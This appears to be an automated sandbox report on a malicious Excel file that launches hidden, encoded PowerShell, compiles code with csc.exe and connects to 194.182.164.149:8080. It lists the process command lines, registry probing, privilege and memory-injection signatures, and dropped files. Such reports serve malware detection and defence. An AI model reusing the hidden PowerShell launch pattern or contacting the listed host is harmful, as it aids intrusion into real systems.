Analysis Overview
SHA256
c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c
Threat Level: Known bad
The file c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Command and Scripting Interpreter: PowerShell
Office macro that triggers on suspicious action
Blocklisted process makes network request
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 21:56
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 21:56
Reported
2024-11-13 21:57
Platform
win7-20240903-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c.xls
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc 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
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\-clt0ezx.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBE60.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBE5F.tmp"
Network
| Country | Destination | Domain | Proto |
| CH | 194.182.164.149:8080 | | tcp |
Files
\??\c:\Users\Admin\AppData\Local\Temp\-clt0ezx.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\-clt0ezx.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\CSCBE5F.tmp
C:\Users\Admin\AppData\Local\Temp\RESBE60.tmp
C:\Users\Admin\AppData\Local\Temp\-clt0ezx.dll
C:\Users\Admin\AppData\Local\Temp\-clt0ezx.pdb
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 21:56
Reported
2024-11-13 21:57
Platform
win10v2004-20241007-en
Max time kernel
33s
Max time network
34s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2740 wrote to memory of 1608 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1608 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 2192 wrote to memory of 4516 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c0c6fd29fb0e19068878eceea6dac88812454f226d96f9244851bfd0df89e77c.xls"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc 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
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xgxcbx5f\xgxcbx5f.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE203.tmp" "c:\Users\Admin\AppData\Local\Temp\xgxcbx5f\CSC79D89201E5314359B4A516A77BDE6E6F.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.32.7:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 7.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| CH | 194.182.164.149:8080 | | tcp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdhuqneh.oor.ps1
\??\c:\Users\Admin\AppData\Local\Temp\xgxcbx5f\xgxcbx5f.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\xgxcbx5f\xgxcbx5f.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\xgxcbx5f\CSC79D89201E5314359B4A516A77BDE6E6F.TMP
C:\Users\Admin\AppData\Local\Temp\RESE203.tmp
C:\Users\Admin\AppData\Local\Temp\xgxcbx5f\xgxcbx5f.dll
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms